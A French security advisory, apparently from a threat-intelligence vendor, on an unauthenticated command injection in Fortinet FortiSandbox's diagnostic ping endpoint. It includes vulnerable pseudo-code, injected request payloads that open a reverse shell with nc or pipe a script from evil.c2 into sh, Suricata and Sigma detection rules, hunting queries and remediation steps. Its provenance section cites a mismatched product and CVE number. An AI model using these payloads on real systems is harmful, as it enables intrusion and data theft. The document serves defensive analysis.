CVE-2026-25089 : injection de commandes système à distance non authentifiée dans l'interface web de Fortinet FortiSandbox
SCORE DE MENACE HERMES & COMPROMISSION DE L'ÉQUIPEMENT D'ANALYSE DE MENACES
Cible :Fortinet FortiSandbox Le CVSS v3.1 attribue la note de 9.8 (Critique) et le CVSS v4.0 évalue la sévérité à 9.8. Le score de menace Hermes s'établit à 98 (CRITIQUE). L'alignement est total : fortiSandbox assure la détonation automatisée et l'analyse approfondie des logiciels malveillants pour les flux d'entreprise (pare-feu FortiGate, messageries FortiMail). La prise de contrôle root permet aux attaquants de falsifier les verdicts d'analyse, d'aveugler le SOC et d'exfiltrer les documents d'entreprise soumis à détonation.
CVE-2026-25089: Unauthenticated Remote OS Command Injection in Fortinet FortiSandbox Web InterfaceVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Fortinet FortiOS Gateway documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
Adversaries abuse command and script interpreters (Bash, Python, PowerShell) to execute arbitrary commands.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Attack execution telemetry aligns with MITRE ATT&CK technique T1059.”
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice des logiciels affectés
Section intitulée « 1. Contexte technique & matrice des logiciels affectés »FortiSandbox réalise l’analyse statique et dynamique multi-niveaux des fichiers et liens suspects transmis par les pare-feu FortiGate, les passerelles de messagerie FortiMail et les agents d’EDR.
| Paramètre | Spécification Technique | Contexte de Menace |
|---|---|---|
| Identifiant CVE | CVE-2026-25089 | Référence CISA KEV |
| Démon vulnérable | fsa_httpd (Service Web d’Administration) | Démon de gestion Apache / FastCGI |
| Système embarqué | FortiSandbox OS (Linux durci) | Boîtiers physiques (FSA-Series) & Virtuels (VM) |
| Vecteur réseau | HTTP/HTTPS (Ports TCP 443, 80) | Interface de gestion et API |
| Cause racine | Concaténation de paramètres non filtrés dans un shell (CWE-78) | Injection de commandes root pré-authentification |
| Versions affectées | FortiSandbox 4.4.0 - 4.4.4, 4.2.0 - 4.2.6, 4.0.0 - 4.0.5 | Grappes d’analyse en entreprise |
| Versions corrigées | 4.4.5, 4.2.7, 4.0.6 | Avis de sécurité Fortinet FG-IR-26-042 |
| Impact d’exploitation | RCE root, altération des verdicts de détection, rebond réseau | Compromission de l’équipement d’analyse de sécurité |
2. Décomposition technique : injection de shell non authentifiée
Section intitulée « 2. Décomposition technique : injection de shell non authentifiée »A. Routine de diagnostic insécurisée
Section intitulée « A. Routine de diagnostic insécurisée »Le code défaillant se situe dans un gestionnaire de diagnostic accessible avant authentification, destiné à vérifier l’état des liaisons réseau :
// Pseudo-code décompilé de la fonction vulnérable dans fsa_httpdint handle_diag_check(http_request_t *req) { char cmd_buf[1024]; char *target_host = get_param(req, "target_host");
if (!target_host) return 400;
// ANOMALIE : Concaténation directe du paramètre utilisateur dans la chaîne de commande snprintf(cmd_buf, sizeof(cmd_buf), "/bin/ping -c 1 %s", target_host); return system(cmd_buf); // Exécuté directement par /bin/sh avec les droits root !}Comme system() invoque /bin/sh -c, l’injection de points-virgules ou d’apostrophes inversées permet de chaîner n’importe quelle commande :
POST /api/v1/diag/ping HTTP/1.1Host: sandbox.corp.internal:443Content-Type: application/json
{ "target_host": "127.0.0.1; nc 198.51.100.55 4444 -e /bin/sh"}+----------------------------------------------------------------------------------------------------+| ARCHITECTURE D'ATTAQUE DE LA CVE-2026-25089 |+----------------------------------------------------------------------------------------------------+
[Attaquant Distant] │ │ [1] HTTP POST /api/v1/diag/ping │ Charge : { "target_host": "127.0.0.1; curl evil.c2/k.sh | sh" } ▼ [Appliance FortiSandbox (fsa_httpd / Port 443)] │ ├───► 1. Gestionnaire de Route Pré-Auth : │ - Route non soumise au contrôle de session │ - Extrait le champ "target_host" du corps JSON │ ├───► 2. Appel Système system() : │ - Exécute : /bin/sh -c "/bin/ping -c 1 127.0.0.1; curl evil.c2/k.sh | sh" │ - S'exécute avec les droits root du démon (UID 0) │ ▼ [Compromission Root Totale de l'Appliance] │ └───► Contrôle complet de l'équipement : - Neutralisation du moteur d'analyse (fichiers malveillants marqués "Sains") - Vol des documents d'entreprise soumis à détonation - Altération des flux de menaces distribués aux pare-feu FortiGate+----------------------------------------------------------------------------------------------------+3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature
Section intitulée « 3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature »- Inclusion CISA KEV : inscrite d’urgence suite à des attaques visant à désactiver la détection de charges virales avancées sur les réseaux d’entreprises cibles.
- TTP opérationnels constatés :
- Modification directe de la base de données des verdicts (
sqlite3 /var/log/fsa.db) afin de requalifier les logiciels malveillants en fichiers inoffensifs. - Utilisation du boîtier FortiSandbox comme passerelle de rebond interne non surveillée par les outils EDR traditionnels.
- Modification directe de la base de données des verdicts (
4. Cartographie MITRE ATT&CK
Section intitulée « 4. Cartographie MITRE ATT&CK »| Tactique | ID Technique | Nom de la Technique | Manifestation dans l’Attaque |
|---|---|---|---|
| Accès initial | T1190 | Exploitation d’application publique | Requête HTTP POST contenant une commande injectée |
| Exécution | T1059.004 | Interpréteur de commandes et scripts : Shell Unix | Exécution de commandes arbitraires via system() en root |
| Évasion de défense | T1562.001 | Altération des défenses | Falsification des verdicts d’analyse de FortiSandbox |
| Persistance | T1543 | Création ou modification de processus système | Dépôt de tâches cron root et de portes dérobées |
5. Ingénierie de détection & télémétrie
Section intitulée « 5. Ingénierie de détection & télémétrie »A. Règle Suricata
Section intitulée « A. Règle Suricata »alert http any any -> $FORTISANDBOX_SERVERS any ( msg:"HERMES DEFENSE - Tentative d'injection de commande FortiSandbox (CVE-2026-25089)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v1/diag/"; http.request_body; pcre:"/(\;|\&\&|\||`|\$\().*(sh|bash|curl|wget|nc)/i"; classtype:attempted-admin; sid:202625089; rev:1; reference:cve,2026-25089;)B. Règle Sigma
Section intitulée « B. Règle Sigma »title: Lancement d'un shell par le démon web d'administration FortiSandboxid: 1f2e3d4c-5b6a-7f8e-9d0c-25089c026e02status: highdescription: Détecte la création de processus shells issus du démon d'administration fsa_httpd de FortiSandbox.author: Hermes Codex Detection Engineeringdate: 2026-09-11logsource: product: linux category: process_creationdetection: selection_parent: ParentImage|endswith: '/fsa_httpd' selection_child: Image|endswith: - '/bin/sh' - '/bin/bash' - '/bin/nc' - '/usr/bin/curl' condition: selection_parent and selection_childfalsepositives: - Opérations rares de maintenance logicielle officielle.level: criticaltags: - attack.initial_access - attack.t1190 - attack.execution - attack.t1059.0046. Réponse à incident & rétro-ingénierie (DFIR)
Section intitulée « 6. Réponse à incident & rétro-ingénierie (DFIR) »Commandes de diagnostic sur la CLI FortiSandbox :
Section intitulée « Commandes de diagnostic sur la CLI FortiSandbox : »- Contrôle des crashs et journaux d’erreurs :
diagnose debug crashlog read# Repérer les arrêts anormaux des processus enfants de fsa_httpd
- Revue des journaux d’accès web :
diagnose log show web-access# Rechercher les requêtes de diagnostic contenant des points-virgules
- Vérification de l’intégrité de la base de données des menaces :
diagnose sandbox status
Requête de chasse (Elasticsearch / OpenSearch) :
Section intitulée « Requête de chasse (Elasticsearch / OpenSearch) : »{ "query": { "bool": { "must": [ { "term": { "http.request.method": "POST" } }, { "wildcard": { "url.path": "*/api/v1/diag/*" } }, { "wildcard": { "http.request.body.content": "*;*" } } ] } }}7. Mesures de remédiation & durcissement
Section intitulée « 7. Mesures de remédiation & durcissement »- Application immédiate du correctif Fortinet : mettre à niveau FortiSandbox vers les versions 4.4.5, 4.2.7 ou 4.0.6.
- Cloisonnement strict des interfaces d’administration : restreindre les ports
80,443et22à un réseau d’administration dédié hors-bande (OOBM) ; ne jamais exposer l’interface sur Internet. - Audit des flux de soumission : vérifier sur les pare-feu FortiGate connectés l’intégrité des flux de communication avec l’appliance.
- Réanalyse des échantillons récents : en cas de compromission avérée, soumettre à nouveau les fichiers suspects analysés récemment pour identifier d’éventuels logiciels malveillants dont les alertes auraient été étouffées.